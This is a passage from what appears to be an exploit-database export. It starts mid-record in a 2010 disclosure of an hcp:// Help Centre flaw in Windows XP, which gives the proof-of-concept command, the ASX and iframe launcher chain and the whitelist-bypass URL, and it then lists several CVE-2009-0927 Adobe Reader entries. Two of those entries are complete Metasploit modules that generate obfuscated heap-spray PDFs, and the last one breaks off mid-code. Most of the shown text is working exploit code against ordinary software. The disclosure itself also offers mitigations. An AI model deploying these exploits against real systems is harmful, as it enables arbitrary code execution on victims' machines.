by\r\nMicrosoft here http://msdn.microsoft.com/en-us/library/ms533719%28VS.85%29.aspx.\r\nNow that we are armed with knowledge of this trick, because these help\r\ndocuments are in a privileged zone, we can simply execute commands.\r\n\r\nYou can test this with a command like so (assuming a recent IE):\r\n\r\nC:\\> ver\r\nMicrosoft Windows XP [Version 5.1.2600]\r\nC:\\> c:\\windows\\pchealth\\helpctr\\binaries\\helpctr.exe -url \"hcp://system/sysinfo/sysinfomain.htm?svr=<script defer>eval(unescape('Run%28%22calc.exe%22%29'))</script>\"\r\nC:\\>\r\n\r\nWhile this is fun, this isn't a vulnerability unless an untrusted third party\r\ncan force you to access it. Testing suggests that by default, accessing an\r\nhcp:// URL from within Internet Explorer >= 8, Firefox, Chrome (and presumably\r\nother browsers) will result in a prompt. 
Although most users will click through\r\nthis prompt (perfectly reasonable, protocol handlers are intended to be safe),\r\nit's not a particularly exciting attack.\r\n\r\nI've found a way to avoid the prompt in a default Windows XP installation in all\r\nmajor browsers. The solution is to invoke the protocol handler from within an\r\n<iframe> in an ASX HtmlView element. There are probably other ways.\r\n\r\nhttp://en.wikipedia.org/wiki/Advanced_Stream_Redirector\r\n\r\nThe version of Windows Media Player that is available by default in Windows XP\r\nis WMP9, which installs an NPAPI and ActiveX plugin to render Windows Media\r\ncontent. Later versions also can be used, with some minor complications.\r\n\r\nThus, the attack will look like this:\r\n\r\n$ cat simple.asx \r\n<ASX VERSION=\"3.0\">\r\n<PARAM name=\"HTMLView\" value=\"http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/starthelp.html\"/>\r\n<ENTRY>\r\n <REF href=\"http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/bug-vs-feature.jpg\"/>\r\n</ENTRY>\r\n</ASX>\r\n\r\nWhere starthelp.html contains something like:\r\n\r\n$ cat starthelp.html \r\n<iframe src=\"hcp://...\">\r\n\r\nForcing a user to read an .ASX file can be achieved in a cross-browser manner like so:\r\n\r\n$ cat launchurl.html \r\n<html>\r\n<head><title>Testing HCP</title></head>\r\n<body>\r\n <h1>OK</h1>\r\n <script>\r\n // HCP:// Vulnerability, Tavis Ormandy, June 2010.\r\n var asx = \"http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/simple.asx\";\r\n\r\n if (window.navigator.appName == \"Microsoft Internet Explorer\") {\r\n // Internet Explorer\r\n var o = document.createElement(\"OBJECT\");\r\n o.setAttribute(\"classid\", \"clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6\");\r\n o.openPlayer(asx);\r\n } else {\r\n // Mozilla, Chrome, Etc.\r\n var o = document.createElement(\"IFRAME\");\r\n o.setAttribute(\"src\", asx);\r\n document.body.appendChild(o);\r\n }\r\n </script>\r\n</body>\r\n</html>\r\n\r\nTherefore, we have 
the following interactions between multiple complex systems\r\nchained together:\r\n\r\n- From an html page, email, document, or other application force a user to\r\n fetch a .ASX file containing an HtmlView element.\r\n- From the HtmlView element, invoke the hcp protocol handler that would normally\r\n require confirmation.\r\n- From the HCP Protocol handler, bypass the /fromhcp whitelist by using the\r\n string miscalculations caused by failing to check the return code of\r\n MPC::HexToNum().\r\n- Once the whitelist has been defeated, invoke the Help document with a known\r\n DOM XSS due to GetServerName() insufficient escaping.\r\n- Use the defer property of a script tag to execute script in a privileged zone\r\n even after the page has been rendered.\r\n- Invoke an arbitrary command using the wscript.shell object.\r\n\r\nFiguring out how to use the MPC::HexToNum() error to defeat the /fromhcp\r\nwhitelist took some analysis, but the result looks like the following.\r\n\r\nhcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%\r\nA%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%\r\n%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A\r\n%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%\r\nA%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3\r\nCscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%\r\n3C/script%3E\r\n\r\n--------------------\r\nAffected Software\r\n------------------------\r\n\r\nAt least Microsoft Windows XP, and Windows Server 2003 are affected. 
The attack\r\nis enhanced against IE >= 8 and other major browsers if Windows Media Player is\r\navailable, but an installation is still vulnerable without it.\r\n\r\nMachines running versions of IE less than 8 are, as usual, in even more trouble.\r\n\r\nIn general, choice of browser, mail client or whatever is not relevant, they\r\nare all equally vulnerable.\r\n\r\n--------------------\r\nConsequences\r\n-----------------------\r\n\r\nUpon successful exploitation, a remote attacker is able to execute arbitrary\r\ncommands with the privileges of the current user.\r\n\r\nI've prepared a demonstration for a typical Windows XP installation with\r\nInternet Explorer 8, and the default Windows Media Player 9.\r\n\r\nhttp://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/launchurl.html\r\n\r\nIn IE7 on Windows XP, just visiting this URL should be sufficient:\r\n\r\nhttp://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/starthelp.html\r\n\r\nSome minor modifications will be required to target other configurations, this\r\nis simply an attempt to demonstrate the problem. I'm sure the smart guys at\r\nmetasploit will work on designing reliable attacks, as security professionals\r\nrequire these to do their jobs.\r\n\r\nAdditionally, my demonstration is not intended to be stealthy, a real\r\nattack would barely be noticeable to the victim. Perhaps the only unavoidable\r\nsignal would be the momentary appearance of the Help Centre window before the\r\nattacker hides it. There are multiple trivial techniques that can be used to\r\naccomplish this.\r\n\r\nBrowsers are useful to demonstrate the problem, but there are certainly other\r\nattack vectors, such as MUAs, documents, etc. 
Protocol handlers are designed to\r\nbe used across applications.\r\n\r\n-------------------\r\nMitigation\r\n-----------------------\r\n\r\nIf you believe you may be affected, you should consider applying one of the\r\nworkarounds described below.\r\n\r\nFew users rely on Help Centre URLs, so it is safe to temporarily disable them\r\nby removing HKCR\\HCP\\shell\\open. This modification can be deployed easily using\r\nGPOs. For more information on Group Policy, see Microsoft's Group Policy site,\r\nhere:\r\n\r\nhttp://technet.microsoft.com/en-us/windowsserver/bb310732.aspx\r\n\r\nA few caveats:\r\n\r\n * I am aware that some support technicians rely on the Remote Assistance\r\n tool provided by the Help Center application using shortcuts like\r\n \"explorer.exe hcp://CN=Microsoft%20Corporation,L=Re...\". You can continue\r\n to use this technique by replacing \"explorer.exe hcp://...\" with\r\n \"helpctr.exe /url hcp://...\", which does not rely on the protocol handler.\r\n\r\n * One or two links in Explorer, such as selecting \"Help\" from the Control\r\n Panel category view, may no longer function. If this concerns you, it is\r\n possible to degrade gracefully by replacing the protocol handler with a\r\n command that opens a static intranet support page, e.g.\r\n \"chrome.exe http://techsupport.intranet\".\r\n\r\n * As always, if you do not use this feature, consider permanently disabling\r\n it in order to reduce attack surface. Historically, disabling unused\r\n protocol handlers has always proven to be a wise investment in security.\r\n\r\nIn the unlikely event that you heavily rely on the use of hcp://, I have\r\ncreated an unofficial (temporary) hotfix. You may use it under the terms of\r\nthe GNU General Public License, version 2 or later. Of course, you should only\r\nuse it as a last resort: carefully test the patch and make sure you understand\r\nwhat it does (full source code is included). 
It may be necessary to modify it\r\nto fit your needs.\r\n\r\nThe package is available for x86 here:\r\n\r\nhttp://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/hcphotfix.zip\r\n\r\n[ NOTE: Please avoid linking to this file out of context, it is intended for\r\n consideration as a potential mitigation by experienced administrators,\r\n and is not suitable for consumption by end-users ]\r\n\r\nThe hotfix intercepts helpctr.exe invocations, and patches MPC::HexToNum() to\r\nreturn zero on error, rather than -1. Nothing is changed on disk, and it can be\r\nsafely removed at any time. Of course, the result of an invalid unescape is still\r\nincorrect, but this specific vulnerability should be rendered inert. I would be\r\ngrateful if the community could contribute bugfixes, testing, an x64 port, and\r\nso on. Once information is in the open, we can all collaborate on our\r\ncollective security.\r\n\r\nSome clarifications:\r\n\r\n * Fixing the XSS is not a solution; the root cause is the whitelist\r\n evasion, and any mitigation that does not address this is simply papering\r\n over the issue. An army of researchers that specialise in XSS exists, and\r\n I'm sure they will turn their attention to help documents once they\r\n realise their value. Assume more will be discovered.\r\n\r\n * That said, if you are an XSS expert, examples in whitelisted pages\r\n (/services/index, /services/search, etc.) would be useful; your skills\r\n could help make this important software safe.\r\n\r\n * Removing Windows Media Player is not a solution; it simply makes a fun\r\n demo for IE8 and other modern browsers.\r\n\r\nFinally, you should take this opportunity to disable all browser plugins and\r\nsafe-for-scripting (SFS) ActiveX controls that are not regularly used. End users can do this\r\nthemselves in Google Chrome by viewing about:plugins and disabling the plugins\r\nthat are not required. 
In Mozilla Firefox, use the Tools->Add-ons->Plugins\r\ninterface.\r\n\r\n-------------------\r\nSolution\r\n-----------------------\r\n\r\nMicrosoft was informed about this vulnerability on 5-Jun-2010, and they\r\nconfirmed receipt of my report on the same day.\r\n\r\nProtocol handlers are a popular source of vulnerabilities, and hcp:// itself\r\nhas been the target of attacks multiple times in the past. I've concluded that\r\nthere's a significant possibility that attackers have studied this component,\r\nand releasing this information rapidly is in the best interest of security.\r\n\r\nThose of you with large support contracts are encouraged to tell your support\r\nrepresentatives that you would like to see Microsoft invest in developing\r\nprocesses for faster responses to external security reports.\r\n\r\n-------------------\r\nCredit\r\n-----------------------\r\n\r\nThis bug was discovered by Tavis Ormandy.\r\n\r\n-------------------\r\nGreetz\r\n-----------------------\r\n\r\nGreetz to Neel, Mark, Redpig, Spoonm, Skylined, asiraP, LiquidK, ScaryBeasts,\r\nHawkes, Jagger, and all my other pimp colleagues.\r\n\r\nSpecial thanks to lcamtuf for his assistance with the deferred execution\r\nproblem. You should read his Browser Security Handbook if you need to\r\nunderstand how web browser security /really/ works.\r\n\r\nhttp://code.google.com/p/browsersec/wiki/Main\r\n\r\nA colleague is organising a conference in Lucerne, Switzerland. He would really\r\nappreciate interesting papers from security people who want to talk about\r\ntheir research (travel, hotel, etc. 
covered).\r\n\r\nhttps://www.hashdays.ch/\r\n\r\n-------------------\r\nNotes\r\n-----------------------\r\n\r\nI would like to point out that if I had reported the MPC::HexToNum() issue\r\nwithout a working exploit, I would have been ignored.\r\n\r\nWithout access to extremely smart colleagues, I would likely have given up,\r\nleaving you vulnerable to attack from those who just want root on your network\r\nand do not care about disclosure policies.\r\n\r\nThis is another example of the problems with bug secrecy (or in PR speak,\r\n\"responsible disclosure\"): those of us who work hard to keep networks safe are\r\nforced to work in isolation without the open collaboration with our peers that\r\nwe need, especially in complex cases like this, where creative thinking and\r\ninput from experts in multiple disciplines is required to join the dots.\r\n\r\nA good place to start researching full disclosure would be this accessible\r\nand insightful essay by Bruce Schneier.\r\n\r\nhttp://www.schneier.com/essay-146.html\r\n\r\nHis balanced coverage of the debate is also available in this essay.\r\n\r\nhttp://www.schneier.com/crypto-gram-0111.html#1\r\n\r\nFinally, a reminder that this document represents my own work and opinions; I\r\ndo not speak for or represent anyone but myself.\r\n\r\n-------------------\r\nReferences\r\n-----------------------\r\n\r\nhcp:// has been broken a few times over the years, for example:\r\n\r\n- http://seclists.org/bugtraq/2002/Aug/225, Delete arbitrary files using Help and Support Center\r\n- http://www.microsoft.com/technet/security/bulletin/ms03-044.mspx, HCP memory corruption by Dave Litchfield.\r\n\r\nThe current design is actually pretty sound; I'm sure Microsoft are\r\ndisappointed they missed this flaw. 
In their defense, I think there's a good\r\nchance I would have also missed this in code review.\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13808/"}, {"lastseen": "2016-02-02T00:14:37", "description": "Adobe Collab.getIcon() Buffer Overflow. CVE-2009-0927. Local exploit for windows platform", "published": "2010-04-30T00:00:00", "type": "exploitdb", "title": "Adobe Collab.getIcon Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2010-04-30T00:00:00", "id": "EDB-ID:16606", "href": "https://www.exploit-db.com/exploits/16606/", "sourceData": "##\r\n# $Id: adobe_geticon.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\r\n\t\t\t\tAffected versions include < 7.1.1, < 8.1.3, and < 9.1. 
By creating a specially\r\n\t\t\t\tcrafted PDF that contains a malformed Collab.getIcon() call, an attacker may\r\n\t\t\t\tbe able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'MC',\r\n\t\t\t\t\t'Didier Stevens <didier.stevens[at]gmail.com>',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0927' ],\r\n\t\t\t\t\t[ 'OSVDB', '53647' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# test results (on Windows XP SP3)\r\n\t\t\t\t\t# reader 7.0.5 - no trigger\r\n\t\t\t\t\t# reader 7.0.8 - no trigger\r\n\t\t\t\t\t# reader 7.0.9 - no trigger\r\n\t\t\t\t\t# reader 7.1.0 - no trigger\r\n\t\t\t\t\t# reader 7.1.1 - reported not vulnerable\r\n\t\t\t\t\t# reader 8.0.0 - works\r\n\t\t\t\t\t# reader 8.1.2 - works\r\n\t\t\t\t\t# reader 8.1.3 - reported not vulnerable\r\n\t\t\t\t\t# reader 9.0.0 - works\r\n\t\t\t\t\t# reader 9.1.0 - reported not vulnerable\r\n\t\t\t\t\t[ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 24 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef autofilter\r\n\t\tfalse\r\n\tend\r\n\r\n\tdef check_dependencies\r\n\t\tuse_zlib\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\t\treturn if ((p = regenerate_payload(cli)) == nil)\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Make some nops\r\n\t\tnops = Rex::Text.to_unescape(make_nops(4))\r\n\r\n\t\t# Randomize variables\r\n\t\trand1 = 
rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(rand(100) + 1)\r\n\t\trand5 = rand_text_alpha(rand(100) + 1)\r\n\t\trand6 = rand_text_alpha(rand(100) + 1)\r\n\t\trand7 = rand_text_alpha(rand(100) + 1)\r\n\t\trand8 = rand_text_alpha(rand(100) + 1)\r\n\t\trand9 = rand_text_alpha(rand(100) + 1)\r\n\t\trand10 = rand_text_alpha(rand(100) + 1)\r\n\t\trand11 = rand_text_alpha(rand(100) + 1)\r\n\t\trand12 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tscript = %Q|\r\n\t\tvar #{rand1} = unescape(\"#{shellcode}\");\r\n\t\tvar #{rand2} =\"\";\r\n\t\tfor (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape(\"#{nops}\");\r\n\t\t#{rand4} = #{rand2} + #{rand1};\r\n\t\t#{rand5} = unescape(\"#{nops}\");\r\n\t\t#{rand6} = 20;\r\n\t\t#{rand7} = #{rand6}+#{rand4}.length\r\n\t\twhile (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};\r\n\t\t#{rand8} = #{rand5}.substring(0, #{rand7});\r\n\t\t#{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});\r\n\t\twhile(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};\r\n\t\t#{rand10} = new Array();\r\n\t\tfor (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};\r\n\t\tvar #{rand12} = unescape(\"%0a\");\r\n\t\twhile(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};\r\n\t\t#{rand12} = \"N.\"+#{rand12};\r\n\t\tCollab.getIcon(#{rand12});\r\n\t\t\t\t\t|\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(script)\r\n\r\n\t\tprint_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")\r\n\r\n\t\tsend_response(cli, pdf, { 'Content-Type' => 'application/pdf' })\r\n\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % 
id\r\n\tend\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\tdef make_pdf(js)\r\n\r\n\t\txref = []\r\n\t\teol = \"\\x0d\\x0a\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << 
eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\t\tpdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\t\tpdf << \"%%EOF\" << eol\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16606/"}, {"lastseen": "2016-02-01T10:54:49", "description": "Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 Collab getIcon Universal Exploit. Local exploit for windows platform", "published": "2009-09-03T00:00:00", "type": "exploitdb", "title": "Adobe Acrobat/Reader < 7.1.1/8.1.3/9.1 - Collab getIcon Universal Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2009-09-03T00:00:00", "id": "EDB-ID:9579", "href": "https://www.exploit-db.com/exploits/9579/", "sourceData": "#!/usr/bin/env python\r\n#\r\n# *** Acrobat Reader - Collab getIcon universal exploiter ***\r\n# evil_pdf.py, tested on Operating Systems:\r\n# Windows XP SP3 English/French\r\n# Windows 2003 SP2 English\r\n# with Application versions:\r\n# Adobe Reader 9.0.0/8.1.2 English/French\r\n# Test methods:\r\n# Standalone PDF, embedded PDF in Firefox 3.0.13 and Internet Explorer 7\r\n# 24/06/2009 - Created by Ivan Rodriguez Almuina (kralor). 
All rights reserved.\r\n# [Coromputer] raised from the ashes.\r\n#\r\n\r\nhttp://www.coromputer.net/CVE-2009-0927_package.zip\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9579.zip (2009-CVE-2009-0927_package.zip)\r\n\r\n# milw0rm.com [2009-09-03]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9579/"}, {"lastseen": "2016-02-01T07:43:15", "description": "Adobe Acrobat Reader 8.1.2 \u2013 9.0 getIcon() Memory Corruption Exploit. CVE-2009-0927. Local exploit for windows platform", "published": "2009-05-04T00:00:00", "type": "exploitdb", "title": "Adobe Acrobat Reader 8.1.2 - 9.0 - getIcon Memory Corruption Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2009-05-04T00:00:00", "id": "EDB-ID:8595", "href": "https://www.exploit-db.com/exploits/8595/", "sourceData": "Affected Version : Acrobat Reader 8.1.2 - 9.0\r\nVendor Patch : http://www.adobe.com/support/security/bulletins/apsb09-04.html\r\nTested On : XP SP2 / SP3\r\n\r\nfrom ZDI : http://www.zerodayinitiative.com/advisories/ZDI-09-014/\r\n\r\nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations\r\nof Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a\r\nmalicious web site or open a malicious file. The specific flaw exists when processing malicious\r\nJavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon()\r\nmethod of a Collab object, proper bounds checking is not performed, resulting in a stack overflow.\r\nIf successfully exploited, full control of the affected machine running under the credentials of the\r\ncurrently logged-in user can be achieved.\r\n\r\nThis vulnerability was discovered by:\r\n\r\nTenable Network Security (there is a man named Nicolas Pouvesle and we know == > he has lots of exploitation methods ; ))\r\n\r\nExploit By : www.Abysssec.com\r\n\r\nNote: this exploit is just for educational purposes, so the shellcode will execute calc; if you want other shellcode, change the shellcode.\r\n\r\nExploit Link : http://abysssec.com/Adobe.Collab.getIcon().pdf\r\nMirror Link : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8595.pdf (2009-Adobe.Collab.getIcon.pdf)\r\n\r\n# milw0rm.com [2009-05-04]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/8595/"}, {"lastseen": "2016-02-02T06:15:21", "description": "Adobe Collab.getIcon() Buffer Overflow. CVE-2009-0927. Local exploit for windows platform", "published": "2010-09-25T00:00:00", "type": "exploitdb", "title": "Adobe Collab.getIcon Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-0927"], "modified": "2010-09-25T00:00:00", "id": "EDB-ID:16681", "href": "https://www.exploit-db.com/exploits/16681/", "sourceData": "##\r\n# $Id: adobe_geticon.rb 10477 2010-09-25 11:59:02Z mc $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe Collab.getIcon() Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.\r\n\t\t\t\tAffected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially\r\n\t\t\t\tcrafted PDF that contains a malformed Collab.getIcon() call, an attacker may\r\n\t\t\t\tbe able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'MC',\r\n\t\t\t\t\t'Didier Stevens <didier.stevens[at]gmail.com>',\r\n\t\t\t\t\t'jduck'\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10477 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-0927' ],\r\n\t\t\t\t\t[ 'OSVDB', '53647' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-014/' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1024,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# test results (on Windows XP SP3)\r\n\t\t\t\t\t# reader 7.0.5 - no trigger\r\n\t\t\t\t\t# reader 7.0.8 - no trigger\r\n\t\t\t\t\t# reader 7.0.9 - no trigger\r\n\t\t\t\t\t# reader 7.1.0 - no trigger\r\n\t\t\t\t\t# reader 7.1.1 - reported not vulnerable\r\n\t\t\t\t\t# reader 8.0.0 - works\r\n\t\t\t\t\t# reader 8.1.2 - works\r\n\t\t\t\t\t# reader 8.1.3 - reported not vulnerable\r\n\t\t\t\t\t# reader 9.0.0 - works\r\n\t\t\t\t\t# reader 9.1.0 
- reported not vulnerable\r\n\t\t\t\t\t[ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Mar 24 2009',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# Encode the shellcode.\r\n\t\tshellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\r\n\r\n\t\t# Make some nops\r\n\t\tnops = Rex::Text.to_unescape(make_nops(4))\r\n\r\n\t\t# Randomize variables\r\n\t\trand1 = rand_text_alpha(rand(100) + 1)\r\n\t\trand2 = rand_text_alpha(rand(100) + 1)\r\n\t\trand3 = rand_text_alpha(rand(100) + 1)\r\n\t\trand4 = rand_text_alpha(rand(100) + 1)\r\n\t\trand5 = rand_text_alpha(rand(100) + 1)\r\n\t\trand6 = rand_text_alpha(rand(100) + 1)\r\n\t\trand7 = rand_text_alpha(rand(100) + 1)\r\n\t\trand8 = rand_text_alpha(rand(100) + 1)\r\n\t\trand9 = 